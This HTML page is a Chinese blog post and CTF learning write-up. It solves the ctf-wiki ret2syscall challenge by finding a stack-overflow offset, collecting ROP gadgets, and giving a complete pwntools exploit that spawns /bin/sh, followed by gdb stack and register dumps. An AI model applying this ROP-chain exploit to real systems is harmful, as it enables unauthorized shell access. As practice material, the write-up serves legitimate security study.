<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn学习," />










<meta name="description" content="这大过年的哪也去不了，为何在家学习呢 。 ok  进入正题   ，今天在 wiki-上学习 pwn 的东西 菜鸡的我正好记录一下   大佬勿喷 在探究 ret2syscall 之前 首先要明确得这四个东西">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn学习之syscall">
<meta property="og:url" content="https://huangpiao.tech/2020/01/28/pwn%E5%AD%A6%E4%B9%A0%E4%B9%8Bsyscall/index.html">
<meta property="og:site_name" content="x1a0g&#39;Blog">
<meta property="og:description" content="这大过年的哪也去不了，为何在家学习呢 。 ok  进入正题   ，今天在 wiki-上学习 pwn 的东西 菜鸡的我正好记录一下   大佬勿喷 在探究 ret2syscall 之前 首先要明确得这四个东西">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-01-28T12:16:32.000Z">
<meta property="article:modified_time" content="2020-01-29T04:00:18.887Z">
<meta property="article:author" content="x1a0g">
<meta property="article:tag" content="pwn学习">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://huangpiao.tech/2020/01/28/pwn学习之syscall/"/>





  <title>pwn学习之syscall | x1a0g'Blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">x1a0g'Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://huangpiao.tech/2020/01/28/pwn%E5%AD%A6%E4%B9%A0%E4%B9%8Bsyscall/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="x1a0g">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="x1a0g'Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">pwn学习之syscall</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-01-28T20:16:32+08:00">
                2020-01-28
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>这大过年的哪也去不了，为何在家学习呢 。</p>
<p>ok  进入正题   ，今天在 wiki-上学习 pwn 的东西 菜鸡的我正好记录一下   大佬勿喷</p>
<p>在探究 ret2syscall 之前</p>
<p>首先要明确得这四个东西</p>
<a id="more"></a>

<p>syscall 这玩意其实就是一些系统函数 比如我们常用得 system    execve 等等</p>
<p>ROP  ,额英文我忘了   中文叫返回导向编程</p>
<p>gadget    就是我们程序的一些指令     你比如说这些</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="number">0x0809ddda</span> : <span class="keyword">pop</span> <span class="built_in">eax</span> <span class="comment">; pop ebx ; pop esi ; pop edi ; ret</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x080bb196</span> : <span class="keyword">pop</span> <span class="built_in">eax</span> <span class="comment">; ret</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x0807217a</span> : <span class="keyword">pop</span> <span class="built_in">eax</span> <span class="comment">; ret 0x80e</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x0804f704</span> : <span class="keyword">pop</span> <span class="built_in">eax</span> <span class="comment">; ret 3</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x0809ddd9</span> : <span class="keyword">pop</span> <span class="built_in">es</span> <span class="comment">; pop eax ; pop ebx ; pop esi ;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">pop</span> <span class="built_in">edi</span> <span class="comment">; ret</span></span><br></pre></td></tr></table></figure>

<p>x86 syscall 函数传参的几个寄存器</p>
<p>通常来说 我们函数的第一个参数，第二个参数以及第三个会分别放在 ebx   ecx  edx  中   而 eax 通常用来存放系统调用号</p>
<p>好了 开搞   ：</p>
<p>这道题目是 ctf-wiki 的题目</p>
<p>拿到之后 checksec 分析一下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     i386-32-little</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    No canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x8048000)</span><br></pre></td></tr></table></figure>
<p>开的 nx    是个 32 位的 ELF 文件</p>
<p>ida 查看伪代码确定了是一个栈溢出的题目</p>
<p>之后去计算偏移</p>
<p>得到了 offset 为 112</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># nmtech @ pwn in ~/Desktop/pwnstudy/ret2syscall [11:43:49] </span></span><br><span class="line">$ cyclic 150                               </span><br><span class="line">aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabma</span><br><span class="line"></span><br><span class="line"><span class="comment"># nmtech @ pwn in ~/Desktop/pwnstudy/ret2syscall [11:48:17] </span></span><br><span class="line">$ cyclic -l 0x62616164</span><br><span class="line">112</span><br></pre></td></tr></table></figure>

<p>由于我们不能直接利用程序中的某一段代码或者自己填写代码来获得 shell，所以我们利用程序中的 gadgets 来获得 shell，而对应的 shell 获取则是利用系统调用</p>
<p>简单地说，只要我们把对应获取 shell 的系统调用的参数放到对应的寄存器中，那么我们在执行 int 0x80 就可执行对应的系统调用。比如说这里我们利用如下系统调用来获取 shell</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">execve</span><span class="params">(<span class="string">"/bin/sh"</span>,NULL,NULL)</span></span></span><br></pre></td></tr></table></figure>


<p>其中，该程序是 32 位，所以我们需要使得</p>
<ul>
<li><p>系统调用号，即 eax 应该为 0xb</p>
</li>
<li><p>第一个参数，即 ebx 应该指向 /bin/sh 的地址，其实执行 sh 的地址也可以。</p>
</li>
<li><p>第二个参数，即 ecx 应该为 0</p>
</li>
<li><p>第三个参数，即 edx 应该为 0</p>
</li>
</ul>
<p>这里就需要使用 gadgets。之后我们去拿我们的 ROPgadget 去找我们需要用到的片段</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ ROPgadget --binary rop --only <span class="string">"pop|ret"</span> |grep <span class="string">"eax"</span></span><br><span class="line">0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x080bb196 : pop eax ; ret</span><br><span class="line">0x0807217a : pop eax ; ret 0x80e</span><br><span class="line">0x0804f704 : pop eax ; ret 3</span><br><span class="line">0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br></pre></td></tr></table></figure>

<p>这个  0x080bb196  用来放 eax </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ ROPgadget --binary rop --only <span class="string">"pop|ret"</span> |grep <span class="string">"edx"</span></span><br><span class="line">0x0806eb69 : pop ebx ; pop edx ; ret</span><br><span class="line">0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret</span><br><span class="line">0x0806eb6a : pop edx ; ret</span><br><span class="line">0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret</span><br></pre></td></tr></table></figure>

<p>这个  0x0806eb90 用来放 剩下得三个参数，正好满足我们的三个参数的传参 格式</p>
<p>之后去找到   /bin/sh    和   int 0x80</p>
<p>完事就可以写我们的 exp 了    ：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">'./rop'</span>)</span><br><span class="line"></span><br><span class="line">raw_input()  <span class="comment">#  这个是想拿 gdb  at 过去</span></span><br><span class="line"></span><br><span class="line">pop_eax=<span class="number">0x080bb196</span></span><br><span class="line"></span><br><span class="line">pop_edx_ecd_ebx=<span class="number">0x0806eb90</span></span><br><span class="line"></span><br><span class="line">bin_sh=<span class="number">0x080be408</span></span><br><span class="line"></span><br><span class="line">int_80=<span class="number">0x08049421</span></span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">'?\n'</span>)</span><br><span class="line"></span><br><span class="line">payload = flat(</span><br><span class="line"></span><br><span class="line">[<span class="string">'a'</span>*<span class="number">112</span>,pop_eax,<span class="number">0xb</span>,pop_edx_ecd_ebx,<span class="number">0</span>,<span class="number">0</span>,bin_sh,int_80])</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>


<p>ok</p>
<p>这样我们完成了这次攻击</p>
<p>完成之后由于是跟的 wiki 来走的   我有自己拿 gdb 去看了一下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[------------------------------------stack-------------------------------------]</span><br><span class="line">0000| 0xffe73c40 --&gt; 0xb (<span class="string">'\x0b'</span>)</span><br><span class="line">0004| 0xffe73c44 --&gt; 0x806eb90 (&lt;__lll_unlock_wake_private+32&gt;:	pop    edx)</span><br><span class="line">0008| 0xffe73c48 --&gt; 0x0 </span><br><span class="line">0012| 0xffe73c4c --&gt; 0x0 </span><br><span class="line">0016| 0xffe73c50 --&gt; 0x80be408 (<span class="string">"/bin/sh"</span>)</span><br><span class="line">0020| 0xffe73c54 --&gt; 0x8049421 (&lt;__libc_setup_tls+321&gt;:	int    0x80)</span><br><span class="line">0024| 0xffe73c58 --&gt; 0x0 </span><br><span class="line">0028| 0xffe73c5c --&gt; 0x80ea00c --&gt; 0x8067b10 (&lt;__stpcpy_sse2&gt;:	mov    edx,DWORD PTR [esp+0x4])</span><br></pre></td></tr></table></figure>



<p>这会就跟到了我们得第一个 gadget  pop eax  | ret</p>
<p>我们可已去看一下我们当前的栈上得状态</p>
<p>这是我们向下走之后到了第二个 gadget 我们可以看到数据已经都在栈上部署完成</p>
<p>之后继续向下走</p>
<p>走到 ret 时候 我们 再去看 我们的寄存器</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">[----------------------------------registers-----------------------------------]</span><br><span class="line">EAX: 0xb (<span class="string">'\x0b'</span>)</span><br><span class="line">EBX: 0x80be408 (<span class="string">"/bin/sh"</span>)</span><br><span class="line">ECX: 0x0 </span><br><span class="line">EDX: 0x0 </span><br><span class="line">ESI: 0x0 </span><br><span class="line">EDI: 0x80ea00c --&gt; 0x8067b10 (&lt;__stpcpy_sse2&gt;:	mov    edx,DWORD PTR [esp+0x4])</span><br><span class="line">EBP: 0x61616161 (<span class="string">'aaaa'</span>)</span><br><span class="line">ESP: 0xffe73c54 --&gt; 0x8049421 (&lt;__libc_setup_tls+321&gt;:	int    0x80)</span><br><span class="line">EIP: 0x806eb93 (&lt;__lll_unlock_wake_private+35&gt;:	ret)</span><br><span class="line">EFLAGS: 0x286 (carry PARITY adjust zero SIGN <span class="built_in">trap</span> INTERRUPT direction overflow)</span><br><span class="line">[-------------------------------------code-------------------------------------]</span><br><span class="line">   0x806eb90 &lt;__lll_unlock_wake_private+32&gt;:	pop    edx</span><br><span class="line">   0x806eb91 &lt;__lll_unlock_wake_private+33&gt;:	pop    ecx</span><br><span class="line">   0x806eb92 &lt;__lll_unlock_wake_private+34&gt;:	pop    ebx</span><br><span class="line">=&gt; 0x806eb93 &lt;__lll_unlock_wake_private+35&gt;:	ret    </span><br><span class="line">   0x806eb94:	xchg   ax,ax</span><br><span class="line">   0x806eb96:	xchg   ax,ax</span><br><span class="line">   0x806eb98:	xchg   ax,ax</span><br><span class="line">   0x806eb9a:	xchg   ax,ax</span><br><span class="line">[------------------------------------stack-------------------------------------]</span><br><span class="line">0000| 0xffe73c54 --&gt; 0x8049421 (&lt;__libc_setup_tls+321&gt;:	int    0x80)</span><br><span class="line">0004| 0xffe73c58 --&gt; 0x0 </span><br><span class="line">0008| 0xffe73c5c --&gt; 0x80ea00c --&gt; 0x8067b10 (&lt;__stpcpy_sse2&gt;:	mov    edx,DWORD PTR [esp+0x4])</span><br><span class="line">0012| 0xffe73c60 --&gt; 0x8049630 (&lt;__libc_csu_fini&gt;:	push   ebx)</span><br><span class="line">0016| 0xffe73c64 --&gt; 0x574e6eca </span><br><span class="line">0020| 0xffe73c68 --&gt; 0x90169f25 </span><br><span class="line">0024| 0xffe73c6c --&gt; 0x0 </span><br><span class="line">0028| 0xffe73c70 --&gt; 0x0 </span><br><span class="line">[------------------------------------------------------------------------------]</span><br></pre></td></tr></table></figure>

<p>这时候我们的 eax  ebx  ecx  edx  包括我们的 int0x80 就部署好了     其实   这个 0x80 就好像我们组合语言中的函数名一样   我们可以把它看成   int 0x80(eax,ebx,ecx,edx)  然后根据 eax 我们去选择调用哪个 syscall</p>
<p>最后     我们拿到了我们的    shell</p>
<p>参考资料    ： <a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn%E5%AD%A6%E4%B9%A0/" rel="tag"># pwn学习</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/01/04/%E5%85%B3%E4%BA%8E%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%9A%84%E6%80%BB%E7%BB%93/" rel="next" title="2020-1-02关于文件上传的总结">
                <i class="fa fa-chevron-left"></i> 2020-1-02关于文件上传的总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/01/29/pwn%E5%AD%A6%E4%B9%A0%E4%B9%8Bret2libc/" rel="prev" title="pwn学习之ret2libc">
                pwn学习之ret2libc <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">x1a0g</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">x1a0g</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
